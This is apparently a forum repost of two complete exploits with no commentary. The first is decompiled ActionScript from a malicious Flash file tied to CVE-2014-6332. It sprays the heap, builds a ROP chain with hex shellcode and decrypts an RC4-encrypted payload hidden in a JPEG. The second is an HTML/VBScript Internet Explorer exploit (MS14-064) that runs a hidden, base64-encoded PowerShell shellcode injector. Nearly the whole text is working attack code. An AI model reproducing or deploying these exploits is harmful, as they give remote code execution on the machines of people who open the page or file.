(this.heapSprayObjAddr + 32); this.btaObj = new ByteArray(); this.outObj = new theoutobj(); this.sndObj = new Sound(); this.vtObj20W = new Vector.<Object>(this.heapSprayLenByEnv20W); this.vtObj1H = new Vector.<Object>(256); var _local1:Number = 500; var _local2:int = (17 * 2); this.workTimerExploit = new Timer((_local1 / 2), _local2); super(); var _local3:* = new URLRequest(); this.jpgBytes = new ByteArray(); this.jpgLoader = new URLLoader(); _local3.url = "shadow.jpg"; this.jpgLoader.dataFormat = URLLoaderDataFormat.BINARY; this.jpgLoader.addEventListener(Event.COMPLETE, this.func_prepare); this.jpgLoader.load(_local3); } private function evalCode(_arg1:uint):void{ if (ExternalInterface.available){ ExternalInterface.call("Beginx", ""); }; } private function checkEvnExploitable():Boolean{ return (true); } private function checksharobject():Boolean{ var _local2:Number; var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA"); if (_local1.size == 0){ _local1.close(); return (false); }; _local2 = (new Date().time - _local1.data.now); if (_local2 < ((((1 * 24) * 60) * 60) * 1000)){ _local1.close(); return (true); }; _local1.close(); return (false); } private function setsharobject():Boolean{ var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA"); if (_local1.size == 0){ _local1.data.now = new Date().time; _local1.flush(); _local1.close(); return (true); }; return (false); } public function func_prepare(_arg1:Event):void{ var _local2:int; var _local3:int; var _local4:int; if (((!(this.checkEvnExploitable())) || (this.checksharobject()))){ return; }; _local2 = 0; while (_local2 < this.heapSprayLenByEnv20W) { this.vtObj20W[_local2] = new Vector.<uint>(this.vtObj20WLen); this.vtObj20W[_local2][(this.vtObj20WLen - 2)] = 1; _local2++; }; _local2 = 0; while (_local2 < 0x0100) { this.vtObj1H[_local2] = new Vector.<Object>(this.vtObj1HLen); _local3 = 0; while (_local3 < this.vtObj1HLen) { this.vtObj1H[_local2][_local3] = this.sndObj; _local3++; }; _local2++; }; this.evalCode(0); this.workTimerExploit.start(); this.workTimerExploit.addEventListener(TimerEvent.TIMER, this.func_step2); } public function func_step2(_arg1:Event):void{ if (this.bExploited == true){ this.workTimerExploit.stop(); return; }; var _local2:int; while (_local2 < this.heapSprayLenByEnv20W) { try { if ((this.vtObj20W[_local2] as Vector.<uint>).length > this.vtObj20WLen){ this.bExploited = true; break; }; } catch(e:Error) { }; _local2++; }; if (!this.bExploited){ return; }; this.workTimerExploit.stop(); this.changedPropertyObjIndex = _local2; this.storedObjIndex = this.changedPropertyObjIndex; _local2 = 0; this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][((0x1000 / 4) - 2)]; if (this.uiNopValue != this.vtObj20WLen){ this._MaxCountPos = (((this.vtObj20W[this.storedObjIndex].length - (0x1000 / 4)) - 2) / (0x1000 / 4)); _local2 = 0; while (_local2 < this._MaxCountPos) { this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))]; if (this.uiNopValue == this.vtObj20WLen){ break; }; _local2++; }; if (_local2 == this._MaxCountPos){ this.bExploited = true; return; }; }; this.recObjAddr = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 1) + ((0x1000 / 4) * _local2))]; this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))] = 1073741823; if (this.checkProperty() == false){ return; }; this.controlledAddr = ((this.heapSprayObjAddr + (0x1000 * (_local2 + 1))) + 8); var _local3:uint; var _local4:uint = (this.controlledAddr + ((this.heapSprayLenByEnv20W - this.changedPropertyObjIndex) * 0x1000)); _local2 = ((this.controlledAddr & 0xFFFFF000) + 0x1000); while (_local2 < _local4) { if (((((((((((((!((this.readUnsignedInt((_local2 + (4 * 4))) == 0))) && (!((this.readUnsignedInt((_local2 + (6 * 4))) == 0))))) && ((this.readUnsignedInt((_local2 + (7 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (8 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (12 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (13 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (15 * 4))) == 2)))){ _local3 = _local2; break; }; _local2 = (_local2 + 0x1000); }; if (!_local3){ return (this.safe_exit()); }; var _local5:int = _local3; while (1) { if (_local5 < 65536){ return (this.safe_exit()); }; if (this.readUnsignedInt((_local5 + 16)) < 5){ break; }; _local5 = this.readUnsignedInt((16 + _local5)); }; var _local6:int; var _local7:int; while (_local6 < 100) { if ((((((this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))) > 0x10000000)) && ((this.readUnsignedInt(((_local5 + 76) + (_local6 * 40))) == 0)))) && ((this.readUnsignedInt(((_local5 + 84) + (_local6 * 40))) == 0)))){ _local7 = this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))); if ((((((((this.readUnsignedInt((_local7 + 4)) == 1007)) && ((this.readUnsignedInt((_local7 + 16)) == this.readUnsignedInt((_local7 + 64)))))) && ((this.readUnsignedInt((_local7 + 28)) == this.readUnsignedInt((_local7 + 44)))))) && (this.readUnsignedInt((_local7 + 28))))){ break; }; }; _local6++; }; if (_local6 == 100){ return (this.safe_exit()); }; _local7 = this.readUnsignedInt((_local7 + 28)); _local7 = (_local7 & 0xFFFFFFFC); var _local8:uint = this.readUnsignedInt(_local7); _local8 = (_local8 & 0xFFFF0000); while (1) { if ((this.readUnsignedInt(_local8) % 65536) == 23117){ break; }; _local8 = (_local8 - 65536); }; var _local9:uint = _local8; _local8 = this.readUnsignedInt((_local9 + 60)); _local8 = this.readUnsignedInt(((_local9 + _local8) + 128)); _local8 = (_local9 + _local8); var _local10:int = _local8; var _local11:int; var _local12:int; _local6 = 0; while (_local6 < 20) { _local8 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 12))); if ((this.readUnsignedInt(_local8) ^ 0x20202020) == 1852990827){ _local12 = (_local9 + this.readUnsignedInt((_local10 + (_local6 * 20)))); _local11 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 16))); break; }; _local6++; }; if (_local6 == 20){ return (this.safe_exit()); }; var _local13:uint; var _local14:uint; var _local15:uint; var _local16:uint; var _local17:int; _local6 = 0; while ((((_local6 < 1367)) && ((_local17 < 2)))) { _local8 = (_local9 + this.readUnsignedInt((_local12 + (_local6 * 4)))); if ((((_local8 == _local9)) || ((_local8 > (_local9 + 0xFFFFFF))))){ break; }; if (((!(_local13)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1953655126)) && ((this.readUnsignedInt((_local8 + 6)) == 1097621877)))) && ((this.readUnsignedInt((_local8 + 10)) == 1668246636)))))){ _local14 = (_local11 + (_local6 * 4)); _local13 = this.readUnsignedInt(_local14); _local17++; } else { if (((!(_local15)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1349805383)) && ((this.readUnsignedInt((_local8 + 6)) == 1097035634)))) && ((this.readUnsignedInt((_local8 + 10)) == 1701995620)))))){ _local16 = (_local11 + (_local6 * 4)); _local15 = this.readUnsignedInt(_local16); _local17++; }; }; _local6++; }; if (_local6 == 1367){ return (this.safe_exit()); }; this.fModuleAddrStart = this.readUnsignedInt((_local9 + 60)); this.fModuleAddrEnd = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 264)); this.fModuleAddrStart = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 260)); this.fModuleAddrStart = (_local9 + this.fModuleAddrStart); this.fModuleAddrEnd = (_local9 + this.fModuleAddrEnd); _local6 = this.fModuleAddrStart; this.writeUnsignedInt((this.stackMemoryStructAddr - 8), this.fModuleAddrStart); this.writeUnsignedInt((this.stackMemoryStructAddr - 4), this.fModuleAddrEnd); var _local18:int; _local6 = this.fModuleAddrStart; while (_local6 < this.fModuleAddrEnd) { if ((((((this.readUnsignedInt(_local6) == _local14)) && (((this.readUnsignedInt((_local6 - 2)) & 0xFFFF) == 5631)))) && (((this.readUnsignedInt((_local6 + 4)) & 0xFF) == 195)))){ _local18 = (_local6 - 2); break; }; _local6++; }; var _local19:uint; var _local20:uint; var _local21:uint; var _local22:uint; var _local23:uint; var _local24:uint; var _local25:uint; var _local26:uint; _local6 = (this.fModuleAddrStart + 0x1000); _local17 = 0; while ((((_local6 < (this.fModuleAddrEnd - 4))) && ((_local17 < 4)))) { _local21 = this.readUnsignedInt(_local6); if (((!(_local26)) && (((_local21 & 0xFFFF) == 50068)))){ _local26 = _local6; _local17++; }; if (((!(_local25)) && (((_local21 & 0xFFFF) == 50070)))){ _local25 = _local6; _local17++; }; if (((!(_local23)) && (((_local21 & 0xFFFF) == 50008)))){ _local23 = _local6; _local17++; }; if (((!(_local24)) && (((_local21 & 0xFFFF) == 8447)))){ _local24 = _local6; _local17++; }; _local6++; }; if ((((((((((((((_local13 == 0)) || ((_local25 == 0)))) || ((_local24 == 0)))) || ((_local23 == 0)))) || ((_local18 == 0)))) || ((_local15 == 0)))) || ((_local26 == 0)))){ return (this.safe_exit()); }; var _local27:int = (_local25 + 1); var _local28:int = (this.heapSprayObjAddr + 65792); var _local29 = (_local28 & 0xFFFFF000); var _local30:ByteArray = new ByteArray(); _local30.endian = Endian.LITTLE_ENDIAN; _local6 = 0; while (_local6 < 0x0100) { var _temp1 = _local6; _local6 = (_local6 + 1); _local30.writeUnsignedInt(this.readUnsignedInt((_local29 + (4 * _temp1)))); }; var _local31:ByteArray = new ByteArray(); _local31.endian = Endian.LITTLE_ENDIAN; _local6 = 0; while (_local6 < 262144) { var _temp2 = _local6; _local6 = (_local6 + 1); _local31.writeUnsignedInt(this.readUnsignedInt((_local28 + (4 * _temp2)))); }; var _local32 = 96; var _local33 = 32; var _local34:int; var _local35:uint = ((_local28 + _local32) + _local33); var _temp3 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local29 + (4 * _temp3)), _local35); _local34 = 0; var _temp4 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp4)), _local27); var _temp5 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp5)), _local25); var _temp6 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp6)), _local23); var _temp7 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp7)), _local28); var _temp8 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp8)), _local18); var _temp9 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp9)), _local29); var _temp10 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp10)), 65536); var _temp11 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp11)), 0x1000); var _temp12 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp12)), 64); var _temp13 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp13)), (_local18 + 6)); var _temp14 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp14)), (_local18 + 6)); var _temp15 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp15)), (_local18 + 6)); var _temp16 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp16)), _local24); var _temp17 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp17)), _local24); this.ropChainLen = (_local34 * 4); while (_local34 < (_local32 / 4)) { var _temp18 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp18)), (_local28 + _local32)); }; while (_local34 < ((_local32 + _local33) / 4)) { var _temp19 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp19)), _local26); }; this.ropChainLen = _local34; var _temp20 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp20)), 2425415307); var _temp21 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp21)), 0x90909090); var _temp22 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp22)), 3096481936); var _temp23 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp23)), (this.heapSprayObjAddr + 8)); var _temp24 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp24)), 3146813584); var _temp25 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp25)), _local15); var _temp26 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp26)), 2425362569); var _temp27 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp27)), 3096481936); var _temp28 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp28)), (_local35 + (((_local34 - this.ropChainLen) + 1) * 4))); var _temp29 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp29)), 2428752127); var _local36 = "81ec8b550003ccec57565300fc6085c70000ffff85c70000fffffc3800000000fd1885c70000ffff85c70000fffffc7000000000fc4485c70001ffff85c70000fffffce400000000fcd885c70000ffff85c70000fffffc3c00000000fd0c85c70000ffff45c70000000000fcf485c70000fffffcc7000000fffc4c85000000ff0085c70000fffffd33000000858966c0fffffc648966c933fffd108ddc85c7ff00fffffcc7000000fffd0485000000fff885c70000fffffcc7000000fffc5085000000ff0885c70000fffffdc7000000fffc5885000000ff5c85c70000fffffcc7000000fffc4885000000ff6885c70000fffffcc7000000fffd2485000000ff4085c70000fffffcc7000000fffc5485000000fffc85c70000fffffcc7000000fffc7485000000ff7885c70000fffffcc7000000fffc7c85000000ffe885c70045fffffcc754454dfffcec854c442efff085c74c00fffffcc7000000fffd1c85000000ff2085c70000fffffdc7000000fffce085000000ff6c85c70000fffffcc7000000fffc8085917432ff8485c70c85fffffcc7bbafdffffc8885de5967ff8c85c71e05fffffcc76144aafffc90853d8815ff9485c76c58fffffcc797410ffffc9885e2f2b2ff9c85c7f4a0fffffcc7cb9765fffca08564a41effa485c7efbbfffffcc72729f8fffca885ae9074ffac85c78093fffffcc794e432fffcb0851f8dc4ffb485c77457fffffcc7ff0d66fffcb885a22f51ffbc85c70139fffffcc7837de2fffcc08507d145ffc485c74863fffffcc74fd189fffcc88517053dffcc85c78ed7fffffcc7818f6efffcd08544d772ffd485c78072fffffce88644d700000000f0002558002dffff89000100fffc488589008bfffffc588530a164ff8b00000085890c40fffffd148b1c408bdc8b0840fc488d8bec83ffff2404c7206553744e042444c76e6f4374082444c7747865740c2444c765726854102444c70000646151ff50548de38b08fffc808d544189ff28bd8d5733fffffdccb966c9f3c0330285c75faafffffd2800010010fd28958d6a52ffffd495fffe89fffffcfffd088508bd83ff00fffffd41e905748b000003fffc9085508589ff8dfffffcfffc8085f88b60ffa164c933000000308b0c408b688b1c4020588b084b38008bb1f375180c4b383332b1ec75750e4b38382eb1e5de75104bf78bed8be859126a0000001fee8bf9e26e686c6a546c6474c48316ff6ae88b0804e85903e20000005145ebf93c758b56782e748b8b56f503f50320764149c93333c503ad10be0fdb0874d63a0307cbc1f1eb40dae7751f3b245e8b5e8b66dd035e8b4b0c8bdd031cc5038b04c3595eab508d8b613bfffffcfffc908de90575ff00000278000000e885895800fffffc5c086a0c6afca895ffff50fffffffcc8957c8589ff83fffffcfffc7cbd057500ff000247e96a586a00a895ff0850fffffcfcc895ff958bfffffffffc7c8b084289fffc7c85087883ffe90575000000021c8d8d586afffffc807c958b518bfffffcff500842fffccc950cc483fffc588d8b3981ffffdeadbeef958b7f75fffffc5841047a81754141417c858b708bfffffcfffc588d08518bff8b045089fffc58850cc083fffc788589046affff001000687c8d8b008bfffffc6a5204518895ff008bfffffcfffc7c8d8b0189fffffc7c95003a83ff858b2374fffffc7c5104488bfc78958b8b52fffffffc7c8551088bfffccc95ffc483ffff7c958b0c83fffffc0575003a000163e968046a000000100000010468ff006a00fffc8895208589ff83fffffdfffd20bd057500ff00013be920858b0050fffffd00010468bc95ff0089fffffcfffc6c856cbd83ff00fffffc15e905758b000001fffd208d6c8d03ffc7fffffc6e69770120958b6403fffffdfffc6c950442c7ff2e706d75fd20858b8503fffffffffc6c650840c76a00657800806800026a0000036a006a8d8b026afffffd20ac95ff5189fffffcfffce085e0bd83fffffffffcade905756a0000006c958d0052fffffcfc7c858b488bffff958b5104fffffc7c8b50028bfffce08d95ff51fffffffcb0fce0958bff52fffffffcb495e8858dff50fffffcfc9895ff8589fffffffffd1cfd1cbd837400ffff8b056a11fffd208d95ff51fffffffcb8958b4aebfffffcf8c095ff5260fffffc140000b8eb20891edb33592b89338b64c033044efd209d8b5350ffff808d8d508bfffffce1ff3849140000b88b008b1e07eb61e0ffffd0e890edebffc35de58b424242427042424277a0908055000000ec81ec8b000002d85608558bf445c75754454d452ef845c7c74c4c440000fc45d28500008d573f74fffd28bd66c933ff3302ccb95faaf3c08d08728bfffd288585c750fffffffd28000100106a544e8b85d1fffe8b0e75c0558d1846d0ff52f40175c0855de58bccc340c033cccccccccccccccc0000cccc"; var _local37:uint = this.writeString((_local28 + (4 * _local34)), _local36); this.writeUnsignedInt(this.heapSprayObjAddr, _local37); var _local38:ByteArray = (new this.keyClass() as ByteArray); var _local39:ByteArray = new ByteArray(); _local38.readBytes(_local39, 0, 0x0100); _local38.endian = Endian.LITTLE_ENDIAN; _local38.position = 0x0100; this.jpgBytes.endian = Endian.LITTLE_ENDIAN; this.jpgBytes.position = 0; ByteArray(this.jpgLoader.data).position = _local38.readInt(); ByteArray(this.jpgLoader.data).readBytes(this.jpgBytes, 0, 0); this.jpgBytes = this.encryption(this.jpgBytes, _local39); this.jpgBytes.endian = Endian.LITTLE_ENDIAN; this.jpgBytes.position = 0; var _local40:* = this.jpgBytes.length; var _local41:int; var _local42:uint; while (((_local41 + 1) * 4) < _local40) { _local42 = this.jpgBytes.readInt(); try { this.writeUnsignedInt((_local37 + (_local41 * 4)), _local42); } catch(e:Error) { }; _local41++; }; var _local43:uint = this.readUnsignedInt(_local7); this.writeUnsignedInt(_local7, _local28); this.sndObj.toString(); this.writeUnsignedInt(_local7, _local43); _local31.position = 0; _local6 = 0; while (_local6 < (_local31.length / 4)) { var _temp30 = _local6; _local6 = (_local6 + 1); this.writeUnsignedInt((_local28 + (4 * _temp30)), _local31.readUnsignedInt()); }; _local30.position = 0; _local6 = 0; while (_local6 < (_local30.length / 4)) { var _temp31 = _local6; _local6 = (_local6 + 1); this.writeUnsignedInt((_local29 + (4 * _temp31)), _local30.readUnsignedInt()); }; this.setsharobject(); return (this.safe_exit()); } public function safe_exit():void{ this.writeUnsignedInt(this.heapSprayObjAddr, this.vtObj20WLen); this.writeUnsignedInt((this.heapSprayObjAddr + 4), this.recObjAddr); this.writeUnsignedInt((this.controlledAddr - 8), this.vtObj20WLen); } public function logMsg(_arg1:String):void{ if (ExternalInterface.available){ }; } public function get_address(_arg1:String):uint{ var _local2:uint; if (ExternalInterface.available){ _local2 = ExternalInterface.call(_arg1, ""); }; return (_local2); } public function exception_exit():void{ if ((this.vtObj20W[this.changedPropertyObjIndex] as Vector.<uint>).length >= 1073741823){ this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - 2)] = this.vtObj20WLen; }; } private function read4bytes(_arg1:uint):uint{ var _local2:uint; if (_arg1 > this.controlledAddr){ _local2 = this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)]; } else { _local2 = this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))]; }; return (_local2); } private function readUnsignedInt(_arg1:uint):uint{ var _local2:uint; var _local3:uint; var _local4:uint; if ((_arg1 % 4) == 0){ _local4 = this.read4bytes(_arg1); } else { if ((_arg1 % 4) == 1){ _local3 = (((this.read4bytes((_arg1 - 1)) & 0xFFFFFF00) / 0x0100) & 0xFFFFFF); _local2 = (((this.read4bytes((_arg1 + 3)) & 0xFF) * 16777216) & 0xFF000000); _local4 = (_local2 + _local3); } else { if ((_arg1 % 4) == 2){ _local3 = (((this.read4bytes((_arg1 - 2)) & 0xFFFF0000) / 65536) & 0xFFFF); _local2 = (((this.read4bytes((_arg1 + 2)) & 0xFFFF) * 65536) & 0xFFFF0000); _local4 = (_local2 + _local3); } else { _local3 = (((this.read4bytes((_arg1 - 3)) & 0xFF000000) / 16777216) & 0xFF); _local2 = (((this.read4bytes((_arg1 + 1)) & 0xFFFFFF) * 0x0100) & 0xFFFFFF00); _local4 = (_local2 + _local3); }; }; }; return (_local4); } private function writeUnsignedInt(_arg1:uint, _arg2:uint):void{ if (_arg1 > this.controlledAddr){ this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)] = _arg2; } else { this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))] = _arg2; }; } public function encryption(_arg1:ByteArray, _arg2:ByteArray):ByteArray{ var _local3:ByteArray = new ByteArray(); var _local4:uint = _arg1.length; _local3 = this.rc4_crypt(_arg2, _arg1, _local4); return (_local3); } public function rc4_crypt(_arg1:ByteArray, _arg2:ByteArray, _arg3:uint):ByteArray{ var _local4:int; var _local5:int; var _local6:int; var _local7:uint; var _local8:uint; var _local9:ByteArray = new ByteArray(); while (_local7 < _arg3) { _local4 = ((_local4 + 1) % 0x0100); _local5 = ((_local5 + _arg1[_local4]) % 0x0100); _local8 = _arg1[_local4]; _arg1[_local4] = _arg1[_local5]; _arg1[_local5] = _local8; _local6 = ((_arg1[_local4] + _arg1[_local5]) % 0x0100); _local9[_local7] = (_arg2[_local7] ^ _arg1[_local6]); _local7++; }; return (_local9); } private function HexString2ByteArray(_arg1:String):ByteArray{ var _local2:String; var _local3:uint = _arg1.length; var _local4:uint; var _local5:ByteArray = new ByteArray(); _local5.endian = Endian.LITTLE_ENDIAN; while (_local4 < _local3) { _local2 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1))); _local5.writeByte(parseInt(_local2, 16)); _local4 = (_local4 + 2); }; return (_local5); } private function writeString(_arg1:int, _arg2:String):int{ var _local3:int; var _local4:int; var _local5:int; var _local6:ByteArray = this.HexString2ByteArray(_arg2); while (_local3 < (_arg2.length / 2)) { _local5 = ((((_local6[_local3] * 16777216) + (_local6[(_local3 + 1)] * 65536)) + (_local6[(_local3 + 2)] * 0x0100)) + _local6[(_local3 + 3)]); _local3 = (_local3 + 4); this.writeUnsignedInt((_arg1 + (_local4 * 4)), _local5); _local4++; }; return ((_arg1 + (_local4 * 4))); } private function checkProperty():Boolean{ var _local1:int; while (_local1 < this.heapSprayLenByEnv20W) { if (this.vtObj20W[_local1].length == 1073741823){ break; }; _local1++; }; if (_local1 == this.heapSprayLenByEnv20W){ return (false); }; this.changedPropertyObjIndex = _local1; return (true); } } }//package class theoutobj { public function theoutobj(){ } public function therundata(_arg1:uint, _arg2:uint, _arg3:uint):uint{ var _local4:uint; return (_local4); } } Sursa: Exploit.SWF.CVE-2014-6332 - Pastebin.com

[h=1]Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)[/h] <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <body> <pre> |--------------------------------------------------------------------------| | Title: OLE Automation Array Remote Code Execution => Pre IE11 | | Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ | | Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) | | Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual | | Usage: http://www.fuzzysecurity.com/exploits/21.html | |--------------------------------------------------------------------------| Very nice black-magic yuange, don't think it went unnoticed that you have been popping shells since 2009 ??????????? |--------------------------------------------------------------------------| </pre> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") 'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!' payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw==" command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" params="-NoP -NonI -Exec Bypass -Command " & command 'Original POC yuange 'set shell=createobject("Shell.Application") 'shell.ShellExecute "notepad.exe" 'With UAC 'shell.ShellExecute "powershell", params, "", "runas", 0 'Without UAC shell.ShellExecute "powershell", params, "", "", 0 end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html> Sursa: http://www.exploit-db.com/exploits/35308/

